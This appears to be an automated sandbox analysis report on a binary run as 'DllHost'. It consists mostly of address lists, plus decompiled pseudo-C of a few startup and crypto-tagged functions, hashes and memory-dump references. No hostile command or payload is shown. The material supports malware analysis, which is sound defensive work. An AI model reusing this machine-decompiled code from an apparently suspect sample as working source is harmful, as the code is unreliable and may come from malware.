                                                                                                                                                              0x7ff7191ce6d7
                                                                                                                                                              0x7ff7191ce6db
                                                                                                                                                              0x7ff7191ce6e5
                                                                                                                                                              0x7ff7191ce6ee
                                                                                                                                                              0x7ff7191ce6f8
                                                                                                                                                              0x7ff7191ce708
                                                                                                                                                              0x7ff7191ce717
                                                                                                                                                              0x7ff7191ce720
                                                                                                                                                              0x7ff7191ce725
                                                                                                                                                              0x7ff7191ce72d
                                                                                                                                                              0x7ff7191ce739
                                                                                                                                                              0x7ff7191ce73e
                                                                                                                                                              0x7ff7191ce746
                                                                                                                                                              0x7ff7191ce74b
                                                                                                                                                              0x7ff7191ce752
                                                                                                                                                              0x7ff7191ce75a
                                                                                                                                                              0x7ff7191ce761
                                                                                                                                                              0x7ff7191ce768
                                                                                                                                                              0x7ff7191ce777
                                                                                                                                                              0x7ff7191ce783
                                                                                                                                                              0x7ff7191ce788
                                                                                                                                                              0x7ff7191ce790
                                                                                                                                                              0x7ff7191ce795
                                                                                                                                                              0x7ff7191ce79e
                                                                                                                                                              0x7ff7191ce7a7
                                                                                                                                                              0x7ff7191ce7ac
                                                                                                                                                              0x7ff7191ce7b4
                                                                                                                                                              0x7ff7191ce7b9
                                                                                                                                                              0x7ff7191ce7c0
                                                                                                                                                              0x7ff7191ce7c4
                                                                                                                                                              0x7ff7191ce7d2
                                                                                                                                                              0x7ff7191ce7da
                                                                                                                                                              0x7ff7191ce7e0
                                                                                                                                                              0x7ff7191ce7e5
                                                                                                                                                              0x7ff7191ce7fa
                                                                                                                                                              0x7ff7191ce7ff
                                                                                                                                                              0x7ff7191ce806
                                                                                                                                                              0x7ff7191ce80b
                                                                                                                                                              0x7ff7191ce80d
                                                                                                                                                              0x7ff7191ce814
                                                                                                                                                              0x7ff7191ce819
                                                                                                                                                              0x7ff7191ce821
                                                                                                                                                              0x7ff7191ce82d
                                                                                                                                                              0x7ff7191ce838
                                                                                                                                                              0x7ff7191ce83e
                                                                                                                                                              0x7ff7191ce846
                                                                                                                                                              0x7ff7191ce849
                                                                                                                                                              0x7ff7191ce851
                                                                                                                                                              0x7ff7191ce85c
                                                                                                                                                              0x7ff7191ce865
                                                                                                                                                              0x7ff7191ce86f
                                                                                                                                                              0x7ff7191ce874
                                                                                                                                                              0x7ff7191ce877
                                                                                                                                                              0x7ff7191ce87c
                                                                                                                                                              0x7ff7191ce880
                                                                                                                                                              0x7ff7191ce885
                                                                                                                                                              0x7ff7191ce889
                                                                                                                                                              0x7ff7191ce88d
                                                                                                                                                              0x7ff7191ce89f
                                                                                                                                                              0x7ff7191ce8a4
                                                                                                                                                              0x7ff7191ce8a8
                                                                                                                                                              0x7ff7191ce8b1
                                                                                                                                                              0x7ff7191ce8b5
                                                                                                                                                              0x7ff7191ce8ba
                                                                                                                                                              0x7ff7191ce8c2
                                                                                                                                                              0x7ff7191ce8c8
                                                                                                                                                              0x7ff7191ce8d3
                                                                                                                                                              0x7ff7191ce8e1
                                                                                                                                                              0x7ff7191ce8ed
                                                                                                                                                              0x7ff7191ce8f0
                                                                                                                                                              0x7ff7191ce905
                                                                                                                                                              0x7ff7191ce909
                                                                                                                                                              0x7ff7191ce916
                                                                                                                                                              0x7ff7191ce918
                                                                                                                                                              0x7ff7191ce91a
                                                                                                                                                              0x7ff7191ce91f
                                                                                                                                                              0x7ff7191ce927
                                                                                                                                                              0x7ff7191ce935
                                                                                                                                                              0x7ff7191ce939
                                                                                                                                                              0x7ff7191ce941
                                                                                                                                                              0x7ff7191ce949
                                                                                                                                                              0x7ff7191ce94d
                                                                                                                                                              0x7ff7191ce953
                                                                                                                                                              0x7ff7191ce95e
                                                                                                                                                              0x7ff7191ce96b
                                                                                                                                                              0x7ff7191ce971
                                                                                                                                                              0x7ff7191ce974
                                                                                                                                                              0x7ff7191ce977
                                                                                                                                                              0x7ff7191ce97a
                                                                                                                                                              0x7ff7191ce986
                                                                                                                                                              0x7ff7191ce98a
                                                                                                                                                              0x7ff7191ce990
                                                                                                                                                              0x7ff7191ce992
                                                                                                                                                              0x7ff7191ce99a
                                                                                                                                                              0x7ff7191ce9a7
                                                                                                                                                              0x7ff7191ce9ad
                                                                                                                                                              0x7ff7191ce9b5
                                                                                                                                                              0x7ff7191ce9b7
                                                                                                                                                              0x7ff7191ce9ba
                                                                                                                                                              0x7ff7191ce9bd
                                                                                                                                                              0x7ff7191ce9c3
                                                                                                                                                              0x7ff7191ce9c6
                                                                                                                                                              0x7ff7191ce9c9
                                                                                                                                                              0x7ff7191ce9cc
                                                                                                                                                              0x7ff7191ce9cf
                                                                                                                                                              0x7ff7191ce9d8
                                                                                                                                                              0x7ff7191ce9dc
                                                                                                                                                              0x7ff7191ce9e2
                                                                                                                                                              0x7ff7191ce9e4
                                                                                                                                                              0x7ff7191ce9ec
                                                                                                                                                              0x7ff7191ce9f8
                                                                                                                                                              0x7ff7191ce9fb
                                                                                                                                                              0x7ff7191cea02
                                                                                                                                                              0x7ff7191cea0b
                                                                                                                                                              0x7ff7191cea11
                                                                                                                                                              0x7ff7191cea13
                                                                                                                                                              0x7ff7191cea1b
                                                                                                                                                              0x7ff7191cea22
                                                                                                                                                              0x7ff7191cea24
                                                                                                                                                              0x7ff7191cea2f
                                                                                                                                                              0x7ff7191cea36
                                                                                                                                                              0x7ff7191cea38
                                                                                                                                                              0x7ff7191cea3f
                                                                                                                                                              0x7ff7191cea44
                                                                                                                                                              0x7ff7191cea4c
                                                                                                                                                              0x7ff7191cea57
                                                                                                                                                              0x7ff7191cea5f
                                                                                                                                                              0x7ff7191cea63
                                                                                                                                                              0x7ff7191cea69
                                                                                                                                                              0x7ff7191cea6d
                                                                                                                                                              0x7ff7191cea72
                                                                                                                                                              0x7ff7191cea7f
                                                                                                                                                              0x7ff7191cea81
                                                                                                                                                              0x7ff7191cea83
                                                                                                                                                              0x7ff7191cea86
                                                                                                                                                              0x7ff7191cea8b
                                                                                                                                                              0x7ff7191cea8d
                                                                                                                                                              0x7ff7191cea96
                                                                                                                                                              0x7ff7191cea9e
                                                                                                                                                              0x7ff7191ceaa2
                                                                                                                                                              0x7ff7191ceaad
                                                                                                                                                              0x7ff7191ceab4
                                                                                                                                                              0x7ff7191ceac5
                                                                                                                                                              0x7ff7191cead1
                                                                                                                                                              0x7ff7191ceae2
                                                                                                                                                              0x7ff7191ceae6
                                                                                                                                                              0x7ff7191ceaf3
                                                                                                                                                              0x7ff7191ceaf5
                                                                                                                                                              0x7ff7191ceaf7
                                                                                                                                                              0x7ff7191ceafc
                                                                                                                                                              0x7ff7191ceb04
                                                                                                                                                              0x7ff7191ceb12
                                                                                                                                                              0x7ff7191ceb16
                                                                                                                                                              0x7ff7191ceb1e
                                                                                                                                                              0x7ff7191ceb22
                                                                                                                                                              0x7ff7191ceb28
                                                                                                                                                              0x7ff7191ceb33
                                                                                                                                                              0x7ff7191ceb40
                                                                                                                                                              0x7ff7191ceb46
                                                                                                                                                              0x7ff7191ceb49
                                                                                                                                                              0x7ff7191ceb4c
                                                                                                                                                              0x7ff7191ceb4f
                                                                                                                                                              0x7ff7191ceb5b
                                                                                                                                                              0x7ff7191ceb5f
                                                                                                                                                              0x7ff7191ceb65
                                                                                                                                                              0x7ff7191ceb67
                                                                                                                                                              0x7ff7191ceb72
                                                                                                                                                              0x7ff7191ceb7f
                                                                                                                                                              0x7ff7191ceb85
                                                                                                                                                              0x7ff7191ceb8d
                                                                                                                                                              0x7ff7191ceb8f
                                                                                                                                                              0x7ff7191ceb92
                                                                                                                                                              0x7ff7191ceb95
                                                                                                                                                              0x7ff7191ceb9b
                                                                                                                                                              0x7ff7191ceb9e
                                                                                                                                                              0x7ff7191ceba1
                                                                                                                                                              0x7ff7191ceba4
                                                                                                                                                              0x7ff7191ceba7
                                                                                                                                                              0x7ff7191cebb0
                                                                                                                                                              0x7ff7191cebb4
                                                                                                                                                              0x7ff7191cebba
                                                                                                                                                              0x7ff7191cebbc
                                                                                                                                                              0x7ff7191cebc4
                                                                                                                                                              0x7ff7191cebcb
                                                                                                                                                              0x7ff7191cebd8
                                                                                                                                                              0x7ff7191cebdb
                                                                                                                                                              0x7ff7191cebe2
                                                                                                                                                              0x7ff7191cebe8
                                                                                                                                                              0x7ff7191cebf1
                                                                                                                                                              0x7ff7191cebf6
                                                                                                                                                              0x7ff7191cebfe
                                                                                                                                                              0x7ff7191cec03
                                                                                                                                                              0x7ff7191cec10
                                                                                                                                                              0x7ff7191cec1a
                                                                                                                                                              0x7ff7191cec22
                                                                                                                                                              0x7ff7191cec26
                                                                                                                                                              0x7ff7191cec2c
                                                                                                                                                              0x7ff7191cec30
                                                                                                                                                              0x7ff7191cec34
                                                                                                                                                              0x7ff7191cec41
                                                                                                                                                              0x7ff7191cec43
                                                                                                                                                              0x7ff7191cec45
                                                                                                                                                              0x7ff7191cec48
                                                                                                                                                              0x7ff7191cec4d
                                                                                                                                                              0x7ff7191cec4f
                                                                                                                                                              0x7ff7191cec58
                                                                                                                                                              0x7ff7191cec5e
                                                                                                                                                              0x7ff7191cec60
                                                                                                                                                              0x7ff7191cec64
                                                                                                                                                              0x7ff7191cec6b
                                                                                                                                                              0x7ff7191cec76
                                                                                                                                                              0x7ff7191cec7c
                                                                                                                                                              0x7ff7191cec83
                                                                                                                                                              0x7ff7191cec88
                                                                                                                                                              0x7ff7191cec8a
                                                                                                                                                              0x7ff7191cec90
                                                                                                                                                              0x7ff7191cec9a
                                                                                                                                                              0x7ff7191cec9c
                                                                                                                                                              0x7ff7191ceca3
                                                                                                                                                              0x7ff7191ceca8
                                                                                                                                                              0x7ff7191cecb0
                                                                                                                                                              0x7ff7191cecb5
                                                                                                                                                              0x7ff7191cecbb
                                                                                                                                                              0x7ff7191cecc3
                                                                                                                                                              0x7ff7191ceccb
                                                                                                                                                              0x7ff7191cecd5
                                                                                                                                                              0x7ff7191cecd9
                                                                                                                                                              0x7ff7191cece0
                                                                                                                                                              0x7ff7191cece7
                                                                                                                                                              0x7ff7191cecf0
                                                                                                                                                              0x7ff7191cecf4
                                                                                                                                                              0x7ff7191cecf9
                                                                                                                                                              0x7ff7191cecfc
                                                                                                                                                              0x7ff7191cecff
                                                                                                                                                              0x7ff7191ced0a
                                                                                                                                                              0x7ff7191ced15
                                                                                                                                                              0x7ff7191ced18
                                                                                                                                                              0x7ff7191ced1e
                                                                                                                                                              0x7ff7191ced20
                                                                                                                                                              0x7ff7191ced29
                                                                                                                                                              0x7ff7191ced2f
                                                                                                                                                              0x7ff7191ced3f
                                                                                                                                                              0x7ff7191ced4a
                                                                                                                                                              0x7ff7191ced4d
                                                                                                                                                              0x7ff7191ced50
                                                                                                                                                              0x7ff7191ced53
                                                                                                                                                              0x7ff7191ced58
                                                                                                                                                              0x7ff7191ced60
                                                                                                                                                              0x7ff7191ced68
                                                                                                                                                              0x7ff7191ced72
                                                                                                                                                              0x7ff7191ced7b
                                                                                                                                                              0x7ff7191ced82
                                                                                                                                                              0x7ff7191ced8f
                                                                                                                                                              0x7ff7191ced91
                                                                                                                                                              0x7ff7191ced93
                                                                                                                                                              0x7ff7191ced9c
                                                                                                                                                              0x7ff7191ced9e
                                                                                                                                                              0x7ff7191ceda1
                                                                                                                                                              0x7ff7191ceda6
                                                                                                                                                              0x7ff7191cedb0
                                                                                                                                                              0x7ff7191cedb5
                                                                                                                                                              0x7ff7191cedc9
                                                                                                                                                              0x7ff7191cedcb
                                                                                                                                                              0x7ff7191cedd0
                                                                                                                                                              0x7ff7191cedd2
                                                                                                                                                              0x7ff7191cedd7
                                                                                                                                                              0x7ff7191ceddf
                                                                                                                                                              0x7ff7191cede3
                                                                                                                                                              0x7ff7191cedec
                                                                                                                                                              0x7ff7191cedf4
                                                                                                                                                              0x7ff7191cedf9
                                                                                                                                                              0x7ff7191cee02
                                                                                                                                                              0x7ff7191cee2b
                                                                                                                                                              0x7ff7191cee34
                                                                                                                                                              0x7ff7191cee39
                                                                                                                                                              0x7ff7191cee41
                                                                                                                                                              0x7ff7191cee46
                                                                                                                                                              0x7ff7191cee49
                                                                                                                                                              0x7ff7191cee51
                                                                                                                                                              0x7ff7191cee54
                                                                                                                                                              0x7ff7191cee56
                                                                                                                                                              0x7ff7191cee5e
                                                                                                                                                              0x7ff7191cee68
                                                                                                                                                              0x7ff7191cee75
                                                                                                                                                              0x7ff7191cee7c
                                                                                                                                                              0x7ff7191cee81
                                                                                                                                                              0x7ff7191cee85
                                                                                                                                                              0x7ff7191cee94
                                                                                                                                                              0x7ff7191cee99
                                                                                                                                                              0x7ff7191cee9f
                                                                                                                                                              0x7ff7191ceea5
                                                                                                                                                              0x7ff7191ceea7
                                                                                                                                                              0x7ff7191ceeae
                                                                                                                                                              0x7ff7191ceeb3
                                                                                                                                                              0x7ff7191ceebb
                                                                                                                                                              0x7ff7191ceec0
                                                                                                                                                              0x7ff7191ceeca
                                                                                                                                                              0x7ff7191ceecf
                                                                                                                                                              0x7ff7191ceed3
                                                                                                                                                              0x7ff7191ceed8
                                                                                                                                                              0x7ff7191ceedc
                                                                                                                                                              0x7ff7191ceee0
                                                                                                                                                              0x7ff7191ceeeb
                                                                                                                                                              0x7ff7191ceef3
                                                                                                                                                              0x7ff7191ceefe
                                                                                                                                                              0x7ff7191cef06
                                                                                                                                                              0x7ff7191cef11
                                                                                                                                                              0x7ff7191cef19
                                                                                                                                                              0x7ff7191cef1f
                                                                                                                                                              0x7ff7191cef24
                                                                                                                                                              0x7ff7191cef2c
                                                                                                                                                              0x7ff7191cef31
                                                                                                                                                              0x7ff7191cef36
                                                                                                                                                              0x7ff7191cef3b
                                                                                                                                                              0x7ff7191cef40
                                                                                                                                                              0x7ff7191cef45
                                                                                                                                                              0x7ff7191cef4a
                                                                                                                                                              0x7ff7191cef53
                                                                                                                                                              0x7ff7191cef58
                                                                                                                                                              0x7ff7191cef5d
                                                                                                                                                              0x7ff7191cef64
                                                                                                                                                              0x7ff7191cef67
                                                                                                                                                              0x7ff7191cef76
                                                                                                                                                              0x7ff7191cef78
                                                                                                                                                              0x7ff7191cef7d
                                                                                                                                                              0x7ff7191cef7f
                                                                                                                                                              0x7ff7191cef84
                                                                                                                                                              0x7ff7191cef89
                                                                                                                                                              0x7ff7191cef8d
                                                                                                                                                              0x7ff7191cef92
                                                                                                                                                              0x7ff7191cef9c
                                                                                                                                                              0x7ff7191cefa4
                                                                                                                                                              0x7ff7191cefa6
                                                                                                                                                              0x7ff7191cefa9
                                                                                                                                                              0x7ff7191cefac
                                                                                                                                                              0x7ff7191cefae
                                                                                                                                                              0x7ff7191cefb4
                                                                                                                                                              0x7ff7191cefc2
                                                                                                                                                              0x7ff7191cefcd
                                                                                                                                                              0x7ff7191cefdb
                                                                                                                                                              0x7ff7191cefe3
                                                                                                                                                              0x7ff7191cefe8
                                                                                                                                                              0x7ff7191ceff2
                                                                                                                                                              0x7ff7191ceffc
                                                                                                                                                              0x7ff7191cf003
                                                                                                                                                              0x7ff7191cf01a

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $ $invalid block type
                                                                                                                                                              • API String ID: 0-2056396358
                                                                                                                                                              • Opcode ID: cccf364f83696506b2107aea45405be225c67a00ee8f892f302cabe229f70a67
                                                                                                                                                              • Instruction ID: c954dc9cc8bd3badd51667f3efc44a09cf807905d9b211baaace2d7a13a0d4e0
                                                                                                                                                              • Opcode Fuzzy Hash: cccf364f83696506b2107aea45405be225c67a00ee8f892f302cabe229f70a67
                                                                                                                                                              • Instruction Fuzzy Hash: 5361D973A14B8A46F760AF05E88C63E7ABDFB00364F914135D65842390DF38E9CADB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D2760 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E00007FF77FF7191D2760(void* __edx, void* __edi, void* __ebp, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				void* _t10;
				void* _t11;
				void* _t25;
				void* _t29;
				intOrPtr _t38;
				void* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				void* _t77;
				void* _t82;
				void* _t90;

				_t90 = __r9;
				_t80 = __rsi;
				_t64 = __rbx;
				_t62 = __rax;
				_t47 = __ebp;
				E00007FF77FF7191D3100(); // executed
				SetUnhandledExceptionFilter(??);
				goto 0x191e3fe4;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_a16 = __rsi;
				_t10 = E00007FF77FF7191D2450(1); // executed
				if (_t10 == 0) goto 0x191d28d3;
				sil = 0;
				_v24 = sil;
				_t11 = E00007FF77FF7191D2414();
				_t38 =  *0x1921ab70; // 0x2
				if (_t38 == 1) goto 0x191d28de;
				if (_t38 != 0) goto 0x191d2809;
				 *0x1921ab70 = 1;
				if (E00007FF77FF7191E2ADC(__rbx, 0x191f9538, 0x191f9570) == 0) goto 0x191d27ea;
				goto 0x191d28c3;
				E00007FF77FF7191E2A78(_t64, 0x191f94d8, 0x191f9530, __rsi, _t82); // executed
				 *0x1921ab70 = 2;
				goto 0x191d2811;
				sil = 1;
				_v24 = sil;
				E00007FF77FF7191D3260(E00007FF77FF7191D25C0(_t11, 0x191f9530));
				if ( *_t62 == 0) goto 0x191d2844;
				if (E00007FF77FF7191D2528(_t62, _t62) == 0) goto 0x191d2844;
				r8d = 0;
				_t63 =  *_t62;
				E00007FF77FF7191D3268( *0x191f94c0(_t77));
				if ( *_t63 == 0) goto 0x191d2866;
				if (E00007FF77FF7191D2528(_t63, _t63) == 0) goto 0x191d2866;
				_t73 =  *_t63;
				E00007FF77FF7191E1CF0( *_t63);
				E00007FF77FF7191E2C94(E00007FF77FF7191E2C9C(E00007FF77FF7191E241C( *_t63, _t80)));
				_t89 = _t63;
				_t76 =  *_t63;
				_t25 = E00007FF77FF7191BE580(_t11,  *_t63, __edi, _t47, __esp, E00007FF77FF7191D2528(_t63, _t63),  *_t63,  *_t63, _t63, _t80, _t90); // executed
				if (E00007FF77FF7191D30AC(_t63) == 0) goto 0x191d28e8;
				if (sil != 0) goto 0x191d289d;
				E00007FF77FF7191E1CD4( *_t63,  *_t63, _t63);
				E00007FF77FF7191D25E4(1, 0);
				_t29 = _t25;
				if (E00007FF77FF7191D30AC(_t63) == 0) goto 0x191d28f0;
				if (_v24 != 0) goto 0x191d28c1;
				E00007FF77FF7191E1CC4(_t73, _t76, _t89);
				return _t29;
			}
















                                                                                                                                                              0x7ff7191d2760
                                                                                                                                                              0x7ff7191d2760
                                                                                                                                                              0x7ff7191d2760
                                                                                                                                                              0x7ff7191d2760
                                                                                                                                                              0x7ff7191d2760
                                                                                                                                                              0x7ff7191d2764
                                                                                                                                                              0x7ff7191d2769
                                                                                                                                                              0x7ff7191d2774
                                                                                                                                                              0x7ff7191d2779
                                                                                                                                                              0x7ff7191d277a
                                                                                                                                                              0x7ff7191d277b
                                                                                                                                                              0x7ff7191d277c
                                                                                                                                                              0x7ff7191d2781
                                                                                                                                                              0x7ff7191d2790
                                                                                                                                                              0x7ff7191d2797
                                                                                                                                                              0x7ff7191d279d
                                                                                                                                                              0x7ff7191d27a0
                                                                                                                                                              0x7ff7191d27a5
                                                                                                                                                              0x7ff7191d27ac
                                                                                                                                                              0x7ff7191d27b5
                                                                                                                                                              0x7ff7191d27bd
                                                                                                                                                              0x7ff7191d27bf
                                                                                                                                                              0x7ff7191d27de
                                                                                                                                                              0x7ff7191d27e5
                                                                                                                                                              0x7ff7191d27f8
                                                                                                                                                              0x7ff7191d27fd
                                                                                                                                                              0x7ff7191d2807
                                                                                                                                                              0x7ff7191d2809
                                                                                                                                                              0x7ff7191d280c
                                                                                                                                                              0x7ff7191d2818
                                                                                                                                                              0x7ff7191d2824
                                                                                                                                                              0x7ff7191d2830
                                                                                                                                                              0x7ff7191d2832
                                                                                                                                                              0x7ff7191d283b
                                                                                                                                                              0x7ff7191d2844
                                                                                                                                                              0x7ff7191d2850
                                                                                                                                                              0x7ff7191d285c
                                                                                                                                                              0x7ff7191d285e
                                                                                                                                                              0x7ff7191d2861
                                                                                                                                                              0x7ff7191d2876
                                                                                                                                                              0x7ff7191d287b
                                                                                                                                                              0x7ff7191d287e
                                                                                                                                                              0x7ff7191d2883
                                                                                                                                                              0x7ff7191d2891
                                                                                                                                                              0x7ff7191d2896
                                                                                                                                                              0x7ff7191d2898
                                                                                                                                                              0x7ff7191d28a1
                                                                                                                                                              0x7ff7191d28a6
                                                                                                                                                              0x7ff7191d28b3
                                                                                                                                                              0x7ff7191d28ba
                                                                                                                                                              0x7ff7191d28bc
                                                                                                                                                              0x7ff7191d28d2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 59578552-0
                                                                                                                                                              • Opcode ID: 00c3951b18b1fb283c987ff5d3340099e41a3d0037335d3c067782c2d7914a55
                                                                                                                                                              • Instruction ID: 8970124d2cfe0964aae7b56b195577b46e0ff1bc10aea33d669af9050a07ff66
                                                                                                                                                              • Opcode Fuzzy Hash: 00c3951b18b1fb283c987ff5d3340099e41a3d0037335d3c067782c2d7914a55
                                                                                                                                                              • Instruction Fuzzy Hash: B5E0EC30E5D95382FA19BF652C860BCE0B01F54738FE00639E11E512C6CD5DA9DB7A72
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C5750 Relevance: 1.8, Strings: 1, Instructions: 533COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191C5750(void* __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v55;
				intOrPtr _v236;
				void* _t9;

				_t9 = __rcx;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				r14d = 0;
				_v236 = r14d;
				r15d = r14d;
				if (__rcx != 0) goto 0x191c5795;
				_t6 = _t9 - 0x66; // -102
				return _t6;
			}






                                                                                                                                                              0x7ff7191c5750
                                                                                                                                                              0x7ff7191c5750
                                                                                                                                                              0x7ff7191c5755
                                                                                                                                                              0x7ff7191c575a
                                                                                                                                                              0x7ff7191c5771
                                                                                                                                                              0x7ff7191c5777
                                                                                                                                                              0x7ff7191c577c
                                                                                                                                                              0x7ff7191c5782
                                                                                                                                                              0x7ff7191c5784
                                                                                                                                                              0x7ff7191c5794

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: E
                                                                                                                                                              • API String ID: 0-3568589458
                                                                                                                                                              • Opcode ID: 9b93b1756a523355f3bfd0fbbe2da47e4b58cdc9eb4861ac5afc31f394a65ef7
                                                                                                                                                              • Instruction ID: bb761c58f04a366e23bb93f1fd472e6559096ad67f09500475df021d9cdb76b9
                                                                                                                                                              • Opcode Fuzzy Hash: 9b93b1756a523355f3bfd0fbbe2da47e4b58cdc9eb4861ac5afc31f394a65ef7
                                                                                                                                                              • Instruction Fuzzy Hash: A1229372B1CA4287F7249E79A5402BEB3B1FB44BE8F800135DE0D57A85DF38E49A9750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C6B30 Relevance: 1.7, Strings: 1, Instructions: 430COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                              			E00007FF77FF7191C6B30(void* __ebx, void* __esi, void* __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, intOrPtr _a40) {
				long long _v48;
				long long _v56;
				signed int _v64;
				void* _v80;
				char _v100;
				char _v104;
				void* __rbx;
				void* __rsi;
				void* __r14;
				void* _t20;
				void* _t29;
				signed long long _t39;
				signed long long _t40;
				signed long long _t51;
				signed long long _t56;

				_t39 =  *0x192190a0; // 0x590452ce5669
				_t40 = _t39 ^ _t56;
				_v64 = _t40;
				r12d = r9d;
				_t41 = __rcx;
				if (__rcx == 0) goto 0x191c7257;
				if ( *((long long*)(__rcx + 0xa0)) == 0) goto 0x191c7257;
				if ( *((long long*)(__rcx + 0x150)) == 0) goto 0x191c6b86;
				E00007FF77FF7191C6350(__rcx, __rcx, _a40, __r8);
				_t20 = E00007FF77FF7191C5500(_t40, __rcx,  &_v100, _a40,  &_v80,  &_v104); // executed
				if (_t20 == 0) goto 0x191c6ba8;
				goto 0x191c6c13;
				_v48 = __rbp;
				_v56 = __rdi;
				0x191da670();
				_t51 = _t40;
				if (_t40 == 0) goto 0x191c6c04;
				0x191da670(); // executed
				 *((long long*)(_t51 + 0x230)) = _v80;
				 *((intOrPtr*)(_t51 + 0x238)) = _v104;
				 *_t51 = _t40;
				 *((long long*)(_t51 + 0x240)) = __rbp;
				 *((intOrPtr*)(_t51 + 0x2e8)) = r12d;
				if (_t40 != 0) goto 0x191c6c2d;
				E00007FF77FF7191D9C88(_v104, _t29, _t41,  &_v100);
				return E00007FF77FF7191D23B0(0xffffff98, _v104, _v64 ^ _t56);
			}


















                                                                                                                                                              0x7ff7191c6b3d
                                                                                                                                                              0x7ff7191c6b44
                                                                                                                                                              0x7ff7191c6b47
                                                                                                                                                              0x7ff7191c6b54
                                                                                                                                                              0x7ff7191c6b5d
                                                                                                                                                              0x7ff7191c6b63
                                                                                                                                                              0x7ff7191c6b71
                                                                                                                                                              0x7ff7191c6b7f
                                                                                                                                                              0x7ff7191c6b81
                                                                                                                                                              0x7ff7191c6b98
                                                                                                                                                              0x7ff7191c6b9f
                                                                                                                                                              0x7ff7191c6ba6
                                                                                                                                                              0x7ff7191c6ba8
                                                                                                                                                              0x7ff7191c6bb2
                                                                                                                                                              0x7ff7191c6bb7
                                                                                                                                                              0x7ff7191c6bbc
                                                                                                                                                              0x7ff7191c6bc2
                                                                                                                                                              0x7ff7191c6bc9
                                                                                                                                                              0x7ff7191c6bd5
                                                                                                                                                              0x7ff7191c6be0
                                                                                                                                                              0x7ff7191c6be6
                                                                                                                                                              0x7ff7191c6be9
                                                                                                                                                              0x7ff7191c6bf0
                                                                                                                                                              0x7ff7191c6bfa
                                                                                                                                                              0x7ff7191c6bff
                                                                                                                                                              0x7ff7191c6c2c

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
